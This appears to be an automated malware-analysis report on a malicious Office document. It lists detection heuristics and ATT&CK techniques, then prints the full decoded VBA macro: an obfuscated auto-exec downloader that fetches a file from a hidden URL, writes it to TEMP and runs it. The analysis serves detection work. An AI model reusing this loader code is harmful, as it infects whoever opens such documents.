MALICIOUS
274
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate an auto-exec loader designed to decode and execute code, likely downloading a second-stage payload. The presence of the 'macros.bas' artifact and the 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' heuristic strongly suggest this behavior. The document was likely delivered as a spearphishing attachment.
Heuristics 11
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4"))) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4"))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
RDQTLNGJUGF HexToString(StrReverse("568756E2E69626F237A6F2D6F636E2F647F68607D2E656D227563737562776F62707F2F2A307474786")), Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5")) -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9199 bytes |
SHA-256: 9cf147cab876c3381eda546c6093cd70cf4b2f0dee383f842f9fe41dbd481b30 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
90 of 147 identifiers look randomly generated (e.g. 'RDQTLNGJUGF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function HexToString(ByVal JKTrmPRyEY As String) As String
Dim VBwxvA As String
Dim szPqqFv As String
Dim qPsQUCrLCt As Long
For qPsQUCrLCt = 1 To Len(JKTrmPRyEY) Step 2
Dim rbFhOBZv As Integer
For rbFhOBZv = 0 To 5
Dim fkWPNAwf As Integer
For fkWPNAwf = 0 To 6
DoEvents
Next fkWPNAwf
DoEvents
Next rbFhOBZv
Dim rvGogSPQ As Integer
For rvGogSPQ = 0 To 5
DoEvents
Next rvGogSPQ
VBwxvA = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(JKTrmPRyEY, qPsQUCrLCt, 2)))
Dim HzFdMdeM As Integer
For HzFdMdeM = 0 To 1
Dim lICZEAhN As Integer
For lICZEAhN = 0 To 6
DoEvents
Next lICZEAhN
DoEvents
Next HzFdMdeM
Dim cqajwczp As Integer
For cqajwczp = 0 To 7
DoEvents
Next cqajwczp
szPqqFv = szPqqFv & VBwxvA
Next qPsQUCrLCt
Dim YoIQocll As Integer
For YoIQocll = 0 To 9
Dim GopYarCd As Integer
For GopYarCd = 0 To 8
DoEvents
Next GopYarCd
DoEvents
Next YoIQocll
Dim LQdmLNOx As Integer
For LQdmLNOx = 0 To 8
DoEvents
Next LQdmLNOx
HexToString = szPqqFv
End Function
Sub Auto_Open()
Dim PeTaKRhj As Integer
For PeTaKRhj = 0 To 4
Dim mVBTMefl As Integer
For mVBTMefl = 0 To 4
Dim kmCtnrZn As Integer
For kmCtnrZn = 0 To 6
DoEvents
Next kmCtnrZn
DoEvents
Next mVBTMefl
Dim qinGrqUL As Integer
For qinGrqUL = 0 To 5
DoEvents
Next qinGrqUL
DoEvents
Next PeTaKRhj
Dim uvpHLkDX As Integer
For uvpHLkDX = 0 To 2
Dim KkPaaIcW As Integer
For KkPaaIcW = 0 To 8
DoEvents
Next KkPaaIcW
DoEvents
Next uvpHLkDX
Dim RKWqNXCv As Integer
For RKWqNXCv = 0 To 6
DoEvents
Next RKWqNXCv
DLKUMLWKOEG
End Sub
Sub AutoOpen()
Dim eBaledvl As Integer
For eBaledvl = 0 To 1
Dim HxmCyTMD As Integer
For HxmCyTMD = 0 To 2
Dim LiADfRQC As Integer
For LiADfRQC = 0 To 3
DoEvents
Next LiADfRQC
DoEvents
Next HxmCyTMD
Dim wMsMVeZO As Integer
For wMsMVeZO = 0 To 1
DoEvents
Next wMsMVeZO
DoEvents
Next eBaledvl
Dim OpBIPQBy As Integer
For OpBIPQBy = 0 To 4
Dim pqsWMmqU As Integer
For pqsWMmqU = 0 To 8
DoEvents
Next pqsWMmqU
DoEvents
Next OpBIPQBy
Dim HEUhMGKf As Integer
For HEUhMGKf = 0 To 5
DoEvents
Next HEUhMGKf
Auto_Open
End Sub
Sub Workbook_Open()
Dim SWhfuEMz As Integer
For SWhfuEMz = 0 To 1
Dim fPOMyfVm As Integer
For fPOMyfVm = 0 To 3
Dim cQVNFqkY As Integer
For cQVNFqkY = 0 To 5
DoEvents
Next cQVNFqkY
DoEvents
Next fPOMyfVm
Dim NcOibOpk As Integer
For NcOibOpk = 0 To 3
DoEvents
Next NcOibOpk
DoEvents
Next SWhfuEMz
Dim uvdRPleD As Integer
For uvdRPleD = 0 To 2
Dim rNOunZYP As Integer
For rNOunZYP = 0 To 1
DoEvents
Next rNOunZYP
DoEvents
Next uvdRPleD
Dim tJvCcYHt As Integer
For tJvCcYHt = 0 To 2
DoEvents
Next tJvCcYHt
Auto_Open
End Sub
Sub DLKUMLWKOEG()
Dim TOHqMUPE As Integer
For TOHqMUPE = 0 To 9
Dim VAxGPZBI As Integer
For VAxGPZBI = 0 To 9
Dim CQvVmKWw As Integer
For CQvVmKWw = 0 To 9
DoEvents
Next CQvVmKWw
DoEvents
Next VAxGPZBI
Dim inWdKTfm As Integer
For inWdKTfm = 0 To 4
DoEvents
Next inWdKTfm
DoEvents
Next TOHqMUPE
Dim EMKpPXUh As Integer
For EMKpPXUh = 0 To 8
Dim dWIiPcUY As Integer
For dWIiPcUY = 0 To 3
DoEvents
Next dWIiPcUY
DoEvents
Next EMKpPXUh
Dim fJaIdcEW As Integer
For fJaIdcEW = 0 To 3
DoEvents
Next fJaIdcEW
RDQTLNGJUGF HexToString(StrReverse("568756E2E69626F237A6F2D6F636E2F647F68607D2E656D227563737562776F62707F2F2A307474786")), Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
End Sub
Function RDQTLNGJUGF(ByVal KVHTAVKOUAU As String, ByVal UCLTAOWUVMW As String) As Boolean
Dim QUGESAIDFJZ As Object, LKELSUATYNM As Long, WJNISNSNALS As Long, NENMVDKFQUK() As Byte
Dim ppnwjoOK As Integer
For ppnwjoOK = 0 To 2
Dim qzoMTkuU As Integer
For qzoMTkuU = 0 To 8
Dim cTbGsmit As Integer
For cTbGsmit = 0 To 8
DoEvents
Next cTbGsmit
DoEvents
Next qzoMTkuU
Dim fSldnRxE As Integer
For fSldnRxE = 0 To 9
DoEvents
Next fSldnRxE
DoEvents
Next ppnwjoOK
Dim WJyuIDzx As Integer
For WJyuIDzx = 0 To 6
Dim FFFIviwO As Integer
For FFFIviwO = 0 To 4
DoEvents
Next FFFIviwO
DoEvents
Next WJyuIDzx
Dim nlZErlIy As Integer
For nlZErlIy = 0 To 2
DoEvents
Next nlZErlIy
Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4")))
QUGESAIDFJZ.Open HexToString(StrReverse("455474")), KVHTAVKOUAU, False
Dim GZWJjEjb As Integer
For GZWJjEjb = 0 To 8
Dim QBCHyWzz As Integer
For QBCHyWzz = 0 To 1
Dim qtHZLDsk As Integer
For qtHZLDsk = 0 To 6
DoEvents
Next qtHZLDsk
DoEvents
Next QBCHyWzz
Dim cPtwrYzE As Integer
For cPtwrYzE = 0 To 8
DoEvents
Next cPtwrYzE
DoEvents
Next GZWJjEjb
Dim NhbUdIxe As Integer
For NhbUdIxe = 0 To 4
Dim tLhYarLT As Integer
For tLhYarLT = 0 To 7
DoEvents
Next tLhYarLT
DoEvents
Next NhbUdIxe
Dim ZrMseRIj As Integer
For ZrMseRIj = 0 To 2
DoEvents
Next ZrMseRIj
QUGESAIDFJZ.Send HexToString(StrReverse("766646764666766646"))
Dim AyLNPGZe As Integer
For AyLNPGZe = 0 To 2
Dim hbRdQmQb As Integer
For hbRdQmQb = 0 To 3
Dim VORRPvvx As Integer
For VORRPvvx = 0 To 9
DoEvents
Next VORRPvvx
DoEvents
Next hbRdQmQb
Dim XMPukTKC As Integer
For XMPukTKC = 0 To 9
DoEvents
Next XMPukTKC
DoEvents
Next AyLNPGZe
Dim lzUaEkvO As Integer
For lzUaEkvO = 0 To 4
Dim ibXsSxlk As Integer
For ibXsSxlk = 0 To 4
DoEvents
Next ibXsSxlk
DoEvents
Next lzUaEkvO
Dim YPAJDXoz As Integer
For YPAJDXoz = 0 To 6
DoEvents
Next YPAJDXoz
NENMVDKFQUK = QUGESAIDFJZ.responseBody
Dim rKRumflG As Integer
For rKRumflG = 0 To 5
Dim rKAbHPtY As Integer
For rKAbHPtY = 0 To 1
Dim srJRkAlR As Integer
For srJRkAlR = 0 To 3
DoEvents
Next srJRkAlR
DoEvents
Next rKAbHPtY
Dim xLfLGgQR As Integer
For xLfLGgQR = 0 To 4
DoEvents
Next xLfLGgQR
DoEvents
Next rKRumflG
Dim imRdIUJG As Integer
For imRdIUJG = 0 To 2
Dim HAQeZeja As Integer
For HAQeZeja = 0 To 1
DoEvents
Next HAQeZeja
DoEvents
Next imRdIUJG
Dim PhhFypwl As Integer
For PhhFypwl = 0 To 9
DoEvents
Next PhhFypwl
WJNISNSNALS = FreeFile
Open UCLTAOWUVMW For Binary Access Write As #WJNISNSNALS
Dim lzSAOeBr As Integer
For lzSAOeBr = 0 To 4
Dim TSbItgBi As Integer
For TSbItgBi = 0 To 3
Dim gDfJiEGE As Integer
For gDfJiEGE = 0 To 9
DoEvents
Next gDfJiEGE
DoEvents
Next TSbItgBi
Dim VUFFJCvs As Integer
For VUFFJCvs = 0 To 4
DoEvents
Next VUFFJCvs
DoEvents
Next lzSAOeBr
Dim okSGuCRm As Integer
For okSGuCRm = 0 To 8
Dim raYlYXmJ As Integer
For raYlYXmJ = 0 To 5
DoEvents
Next raYlYXmJ
DoEvents
Next okSGuCRm
Dim bbBBSZYD As Integer
For bbBBSZYD = 0 To 2
DoEvents
Next bbBBSZYD
Put #WJNISNSNALS, , NENMVDKFQUK
Dim QaFkkQqJ As Integer
For QaFkkQqJ = 0 To 1
Dim KgNPsfae As Integer
For KgNPsfae = 0 To 8
Dim gOREHCbB As Integer
For gOREHCbB = 0 To 3
DoEvents
Next gOREHCbB
DoEvents
Next KgNPsfae
Dim UZdCYIXa As Integer
For UZdCYIXa = 0 To 6
DoEvents
Next UZdCYIXa
DoEvents
Next QaFkkQqJ
Dim wXiuhGtX As Integer
For wXiuhGtX = 0 To 4
Dim qpjTMiPz As Integer
For qpjTMiPz = 0 To 2
DoEvents
Next qpjTMiPz
DoEvents
Next wXiuhGtX
Dim uQLRpnHa As Integer
For uQLRpnHa = 0 To 2
DoEvents
Next uQLRpnHa
Close #WJNISNSNALS
Dim IlglHHlr As Integer
For IlglHHlr = 0 To 9
Dim rKweltnT As Integer
For rKweltnT = 0 To 5
Dim PsEGTeGh As Integer
For PsEGTeGh = 0 To 4
DoEvents
Next PsEGTeGh
DoEvents
Next rKweltnT
Dim yHvukYGy As Integer
For yHvukYGy = 0 To 7
DoEvents
Next yHvukYGy
DoEvents
Next IlglHHlr
Dim jcPXTVjJ As Integer
For jcPXTVjJ = 0 To 7
Dim tXVqAFtW As Integer
For tXVqAFtW = 0 To 7
DoEvents
Next tXVqAFtW
DoEvents
Next jcPXTVjJ
Dim NblnLNIn As Integer
For NblnLNIn = 0 To 4
DoEvents
Next NblnLNIn
Dim BkjovcRK As Integer
For BkjovcRK = 0 To 6
Dim KdozPmWR As Integer
For KdozPmWR = 0 To 2
Dim nlmvNYJM As Integer
For nlmvNYJM = 0 To 8
DoEvents
Next nlmvNYJM
DoEvents
Next KdozPmWR
Dim rzxsuBll As Integer
For rzxsuBll = 0 To 4
DoEvents
Next rzxsuBll
DoEvents
Next BkjovcRK
Dim JxgRkAft As Integer
For JxgRkAft = 0 To 1
Dim inLnZXeK As Integer
For inLnZXeK = 0 To 2
DoEvents
Next inLnZXeK
DoEvents
Next JxgRkAft
Dim QuNVUcuP As Integer
For QuNVUcuP = 0 To 7
DoEvents
Next QuNVUcuP
Set fdgfdgfdg = CreateObject(HexToString(StrReverse("E6F69647163696C6070714E2C6C6568635")))
fdgfdgfdg.Open Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
Dim piDcXsCJ As Integer
For piDcXsCJ = 0 To 8
Dim QaIyLQAK As Integer
For QaIyLQAK = 0 To 7
Dim jnjQszjd As Integer
For jnjQszjd = 0 To 4
DoEvents
Next jnjQszjd
DoEvents
Next QaIyLQAK
Dim DMtUQQGh As Integer
For DMtUQQGh = 0 To 1
DoEvents
Next DMtUQQGh
DoEvents
Next piDcXsCJ
Dim psfPMqkE As Integer
For psfPMqkE = 0 To 2
Dim fHBacWtK As Integer
For fHBacWtK = 0 To 3
DoEvents
Next fHBacWtK
DoEvents
Next psfPMqkE
Dim ibBzwrxk As Integer
For ibBzwrxk = 0 To 2
DoEvents
Next ibBzwrxk
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.